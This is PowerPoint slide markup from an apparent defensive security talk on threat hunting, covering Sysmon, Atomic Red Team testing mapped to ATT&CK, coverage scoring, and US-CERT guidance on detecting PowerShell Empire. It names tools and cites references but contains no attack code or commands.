      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="6330462"/>
            <a:ext cx="5850988" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: https://blogs.msdn.microsoft.com/powershell/2017/04/10/a-comparison-of-shell-and-scripting-language-security/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785723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50155-340D-484E-81A1-FC08DC0CE243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Turned On.  Oh no.. (says </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69268891-F50A-4D24-9D77-BF64018C62D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="1730667"/>
            <a:ext cx="5638800" cy="4953000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECC6A02B-B423-4171-B311-D8EF83299645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="27135" t="17720" r="2010" b="15913"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5807747" y="3634996"/>
            <a:ext cx="3581400" cy="2515943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128713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919BCE-9886-4AC9-9E50-DA2C3B80CEDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786778" y="2233545"/>
            <a:ext cx="8197114" cy="806020"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0"/>
              <a:t>Atomic Red Team has some Adversary TTPs mapped to ATT&amp;CK framework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E3DB11B-522C-4D97-A2A3-AC8F576011AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yourself!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A9B8338-ECAE-43AE-91DD-890EF994AF93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786778" y="6303264"/>
            <a:ext cx="5507144" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/redcanaryco/atomic-red-team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="989182" y="3039565"/>
            <a:ext cx="6458851" cy="2638793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="970044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t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Navigator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to visualize your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defensive coverage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172FC8DB-BB4A-44CA-A0CD-D8E55500213B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1558624"/>
            <a:ext cx="9144001" cy="6315075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2008640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t>Plan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defenses! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879D1942-EEFB-4F41-963E-CE71B1A68FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697608"/>
            <a:ext cx="9144000" cy="3462783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="85344" y="6143732"/>
            <a:ext cx="6254496" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: https://cyberwardog.blogspot.com/2017/07/how-hot-is-your-hunt-team.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188341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D9823A-34DF-453F-8448-C572B45F3D3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jesse Moore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Response Team @ UW Medicine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certs are to many to list (lookup me up on LinkedIn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GIAC Certified Forensics Analysts, GIAC Penetration Tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.linkedin.com/in/jessefmoore/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Jessefmoore+DFIR@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2C2B49B-FC1E-430E-B194-861C9567FFB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Enablers, Just someone wanting to assist with Security!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B56F199-2B11-49B9-8364-5AEC4B8E7C0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHO Am I?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95657FCF-E1B2-46E8-BCFC-3103C8D27CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227995" y="4143089"/>
            <a:ext cx="1514686" cy="1076475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1266447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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to Score how we are doing?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9577E247-C172-421C-B0C8-A5A729396C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1555669"/>
            <a:ext cx="9144000" cy="4586990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351692" y="6444761"/>
            <a:ext cx="5978770" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: https://cyberwardog.blogspot.com/2017/07/how-hot-is-your-hunt-team.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1236181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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Measuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>how we get better…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{014DF802-0CD5-406A-BD75-96261B3B56EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1430001"/>
            <a:ext cx="9144000" cy="3997997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307731" y="6506308"/>
            <a:ext cx="5943600" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: https://cyberwardog.blogspot.com/2017/07/how-hot-is-your-hunt-team.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2600502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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>US-CERT (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShell Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C312F32D-332F-4C02-AA72-301580A936EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="781050" y="1848754"/>
            <a:ext cx="5838542" cy="4543425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781050" y="6500598"/>
            <a:ext cx="5838542" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: https://www.us-cert.gov/ncas/alerts/AA18-284A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2948253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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>US-CERT (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShell Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374A3BDA-C63D-421F-97DC-A293D9AFD4F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1555669"/>
            <a:ext cx="9144000" cy="5650787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3058710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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>US-CERT ( Detection/Protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShell Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
